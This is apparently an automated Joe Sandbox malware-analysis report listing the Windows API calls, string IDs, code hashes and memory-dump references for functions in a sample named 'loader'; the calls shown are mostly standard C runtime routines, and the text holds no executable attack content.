                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: 4d1e820d1cae1ffe1d2bb459482c2b945b02d9b4380b2c43993f4bfda121e69d
                                                                                      • Instruction ID: d3767d9c4879359b110708b2142797feb567071a1e13645a72e4b27953cea3d3
                                                                                      • Opcode Fuzzy Hash: 4d1e820d1cae1ffe1d2bb459482c2b945b02d9b4380b2c43993f4bfda121e69d
                                                                                      • Instruction Fuzzy Hash: CE71C67191521D5EDF21EF249C8DABABBB9EF05301F2441D9E809A3251FB308E998F58
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00255450
                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0025551C
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0025553C
                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00255546
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 254469556-0
                                                                                      • Opcode ID: 325c7543dc95865430d9c0b88627d542faef36e3e5ee48d92ad15d774fa81d50
                                                                                      • Instruction ID: a55a389b6a7ee64dd59c463825cd4d96488d6977c3c22c43e63f4917ed7daaec
                                                                                      • Opcode Fuzzy Hash: 325c7543dc95865430d9c0b88627d542faef36e3e5ee48d92ad15d774fa81d50
                                                                                      • Instruction Fuzzy Hash: 29311875D152289BDF10DFA4D9897CDBBB8BF08305F1041AAE40DAB250EBB09A89CF45
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00254CB6
                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00254CC4
                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00254CD5
                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00254CE6
                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00254CF7
                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00254D08
                                                                                      • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00254D19
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00254D2A
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00254D3B
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00254D4C
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00254D5D
                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00254D6E
                                                                                      • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00254D7F
                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00254D90
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00254DA1
                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00254DB2
                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00254DC3
                                                                                      • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00254DD4
                                                                                      • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00254DE5
                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00254DF6
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00254E07
                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00254E18
                                                                                      • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00254E29
                                                                                      • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00254E3A
                                                                                      • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00254E4B
                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00254E5C
                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00254E6D
                                                                                      • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00254E7E
                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00254E8F
                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00254EA0
                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00254EB1
                                                                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00254EC2
                                                                                      • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00254ED3
                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00254EE4
                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00254EF5
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00254F06
                                                                                      • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00254F17
                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00254F28
                                                                                      • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00254F39
                                                                                      • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00254F4A
                                                                                      • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00254F5B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                      • API String ID: 667068680-295688737
                                                                                      • Opcode ID: 213e2054ff3ebcb3b2ee0bde9d2d02857dc85d887696eac70667c3e66d55cab7
                                                                                      • Instruction ID: 83dc76c25bfe55de3d6e0c70f3328933ac12788a0e8353ac7a004c428678fc24
                                                                                      • Opcode Fuzzy Hash: 213e2054ff3ebcb3b2ee0bde9d2d02857dc85d887696eac70667c3e66d55cab7
                                                                                      • Instruction Fuzzy Hash: 1E6112719B6390ABC7117FF4BD4D8E63BACAB1A7067108416F141D3261DFF460D18BA0
                                                                                      APIs
                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 002591F2
                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00259300
                                                                                      • CatchIt.LIBVCRUNTIME ref: 00259351
                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00259452
                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 0025946D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                      • String ID: @]%$csm$csm$csm
                                                                                      • API String ID: 4119006552-1152799148
                                                                                      • Opcode ID: 5d6b606ccec91c171be2ff7b9ee927be265ef36755e89e2530d967d8abaf0f6b
                                                                                      • Instruction ID: 6a881bc5a9d96c4377f71d488673dde70a51086b6f1f4a9e43ad7cd75b73018c
                                                                                      • Opcode Fuzzy Hash: 5d6b606ccec91c171be2ff7b9ee927be265ef36755e89e2530d967d8abaf0f6b
                                                                                      • Instruction Fuzzy Hash: 27B1693182021AEFCF15DFA4C8819AEB7B5FF04312B14405AEC156B252D771DEAACF99
                                                                                      APIs
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00256167
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0025616F
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 002561F8
                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00256223
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00256278
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                      • String ID: ^%$csm
                                                                                      • API String ID: 1170836740-290365969
                                                                                      • Opcode ID: b0731c60ca1c0131d980e5b10a839ad3a7a0538c614b68cd61d81fac2a4be2c1
                                                                                      • Instruction ID: 24461272d99464931334caab02376a4401266f9b80ac7fd8ec72d22bc90ff461
                                                                                      • Opcode Fuzzy Hash: b0731c60ca1c0131d980e5b10a839ad3a7a0538c614b68cd61d81fac2a4be2c1
                                                                                      • Instruction Fuzzy Hash: EF41F534A20209DBCF10DF68C848AAEBBB4BF05315F548155EC199B392D731AA69CF94
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: __freea$__alloca_probe_16$Info
                                                                                      • String ID:
                                                                                      • API String ID: 127012223-0
                                                                                      • Opcode ID: 56e0ccb62e40b35923579e942cc6da2a48713aead0fce9af8e332aa8f64ce160
                                                                                      • Instruction ID: 570a89f0fac3fad8692a0d265cfd3f25d5ea449f2917dd0c3737beed2bb3431a
                                                                                      • Opcode Fuzzy Hash: 56e0ccb62e40b35923579e942cc6da2a48713aead0fce9af8e332aa8f64ce160
                                                                                      • Instruction Fuzzy Hash: 507125729202469FDF219F548CC2BAF77B9AF48311F580056ED05A7281EB70DCB4AF94
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00259EE2,002541E0,?,00000000,?,?,?,00259BEB,00000022,FlsSetValue,00263DDC,00263DE4,?), ref: 00259E94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID: api-ms-$ext-ms-
                                                                                      • API String ID: 3664257935-537541572
                                                                                      • Opcode ID: 947473c3bed25c23f4e8db050f959c3dbee4877883300d34ed3552df263238f6
                                                                                      • Instruction ID: 41d8876306f67206abe4c00151752f22aa8f948d9475dc0f146a84a21607e455
                                                                                      • Opcode Fuzzy Hash: 947473c3bed25c23f4e8db050f959c3dbee4877883300d34ed3552df263238f6
                                                                                      • Instruction Fuzzy Hash: DE21EB31A10212EBC721DF60EC46B6A375CEF42BB2F250112ED16E7291DB70ED55C6D4
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: d518dd7b17a3c59ff843ad2fce44ff8a39cf18a5a0ebf486acfe024b521acad0
                                                                                      • Instruction ID: ad4db5412a7b87984affbb20010b3aaee4c9ba8d77d0ec7016fd5d8c4b2da76f
                                                                                      • Opcode Fuzzy Hash: d518dd7b17a3c59ff843ad2fce44ff8a39cf18a5a0ebf486acfe024b521acad0
                                                                                      • Instruction Fuzzy Hash: A4716EB4925209CFCB08DFACD5586AEFBF0EB48700F20851EF84AAB350DB7499658F51
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,00258831,00255F0D,002555A4), ref: 00258848
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00258856
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0025886F
                                                                                      • SetLastError.KERNEL32(00000000,00258831,00255F0D,002555A4), ref: 002588C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      • Opcode ID: e11f98fc6ce6c5cc86dee352366bc4ff1d8d9e48c6cec4feb1c993c2ae044ee6
                                                                                      • Instruction ID: 181e92d1616f54782504849737fecf22ccf3a76c04bcaeb1fecf194a5d6a54fe
                                                                                      • Opcode Fuzzy Hash: e11f98fc6ce6c5cc86dee352366bc4ff1d8d9e48c6cec4feb1c993c2ae044ee6
                                                                                      • Instruction Fuzzy Hash: C501D83213D21A9DE6252F74BC8EA1A2759EB117B73600329FD11A51F0EFF18C69968C
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,002625EB,000000FF,?,00257015,?,?,002570B1,00000000), ref: 00256F89
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00000000,002625EB,000000FF,?,00257015,?,?,002570B1,00000000), ref: 00256F9B
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,002625EB,000000FF,?,00257015,?,?,002570B1,00000000), ref: 00256FBD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: 9c0c6d4be1d0398295538fe0d2d61482bb7519b1a032e974c7316f14963a5065
                                                                                      • Instruction ID: 91b171cee3b07e10b9935d4ee13932f23c0f48d0af41b7f5d248a2b8d1c7ecac
                                                                                      • Opcode Fuzzy Hash: 9c0c6d4be1d0398295538fe0d2d61482bb7519b1a032e974c7316f14963a5065
                                                                                      • Instruction Fuzzy Hash: 9301623192865AABDB118F50EC0DFAEB7BCFB04B15F044625E812E26A0DFB49954CA94
                                                                                      APIs
                                                                                      • __alloca_probe_16.LIBCMT ref: 0025DFA2
                                                                                      • __alloca_probe_16.LIBCMT ref: 0025E06B
                                                                                      • __freea.LIBCMT ref: 0025E0D2
                                                                                        • Part of subcall function 0025BC45: HeapAlloc.KERNEL32(00000000,?,00000000,?,002541E0,?,?,00251007,?,0024FAB5), ref: 0025BC77
                                                                                      • __freea.LIBCMT ref: 0025E0E5
                                                                                      • __freea.LIBCMT ref: 0025E0F2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1096550386-0
                                                                                      • Opcode ID: 59570195801e93807718d52a0b657948e6d35de16fd4f2237e44db4ddab00722
                                                                                      • Instruction ID: 986c8dcbf2568fad0f59aecb4cb9ad66d08cd5a8273defd585f14ebdc47a5a31
                                                                                      • Opcode Fuzzy Hash: 59570195801e93807718d52a0b657948e6d35de16fd4f2237e44db4ddab00722
                                                                                      • Instruction Fuzzy Hash: C751D771530216AFDF256F60CC41DBB77A9EF44712B164029FD04E6181EBB1CD78CA68
                                                                                      APIs
                                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,002593FE,?,?,00000000,00000000,00000000,?), ref: 0025951D
                                                                                      • CatchIt.LIBVCRUNTIME ref: 00259603
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CatchEncodePointer
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 1435073870-2084237596
                                                                                      • Opcode ID: a8d49c38f42bfc8f334d4c1943ae1188b1e574a260c5ed22549beeb0e304c7fc
                                                                                      • Instruction ID: 683026ba307b18abd27b981e5e0ef7756125d05c754a92dc2fc57928c4da2855
                                                                                      • Opcode Fuzzy Hash: a8d49c38f42bfc8f334d4c1943ae1188b1e574a260c5ed22549beeb0e304c7fc
                                                                                      • Instruction Fuzzy Hash: 3841677190020AEFCF16CF94C881AAE7BB9EF48301F188099F905A7211E735D9A8CB58
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0025DCFA,00000000,?,0026CCD0,?,?,?,0025DC31,00000004,InitializeCriticalSectionEx,002646F8,00264700), ref: 0025DC6B
                                                                                      • GetLastError.KERNEL32(?,0025DCFA,00000000,?,0026CCD0,?,?,?,0025DC31,00000004,InitializeCriticalSectionEx,002646F8,00264700,00000000,?,0025971C), ref: 0025DC75
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0025DC9D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID: api-ms-
                                                                                      • API String ID: 3177248105-2084034818
                                                                                      • Opcode ID: 6b49698fbfe501670bc3fd2beb2388d51710b45179d7bcb305f8766780ed7829
                                                                                      • Instruction ID: ec46a85c5822dff356d531a0e93fb94fef6302bc80af3d360fac48d54d125535
                                                                                      • Opcode Fuzzy Hash: 6b49698fbfe501670bc3fd2beb2388d51710b45179d7bcb305f8766780ed7829
                                                                                      • Instruction Fuzzy Hash: FDE04830250205BFEF202F61ED0AB583B59AB01B57F108021FD0DE80E1EFF2A865D548
                                                                                      APIs
                                                                                      • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 0025E64B
                                                                                        • Part of subcall function 0025D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,002587B1,?,00000000,?), ref: 0025D192
                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0025E89D
                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0025E8E3
                                                                                      • GetLastError.KERNEL32 ref: 0025E986
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                      • String ID:
                                                                                      • API String ID: 2112829910-0
                                                                                      • Opcode ID: b09f7ef11ccca8cbc062681f3c4ed2cdcd139e27f796a54e7771d61cf75c628f
                                                                                      • Instruction ID: 22ebe513b7329a7d2eb4a9a7cbbffd70cf4473396eb0d7c5488e47ca29418c59
                                                                                      • Opcode Fuzzy Hash: b09f7ef11ccca8cbc062681f3c4ed2cdcd139e27f796a54e7771d61cf75c628f
                                                                                      • Instruction Fuzzy Hash: 58D1BB71D102489FCF19CFA8C8849ADFBB8FF09311F29412AE865EB251D630AA56CF54
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
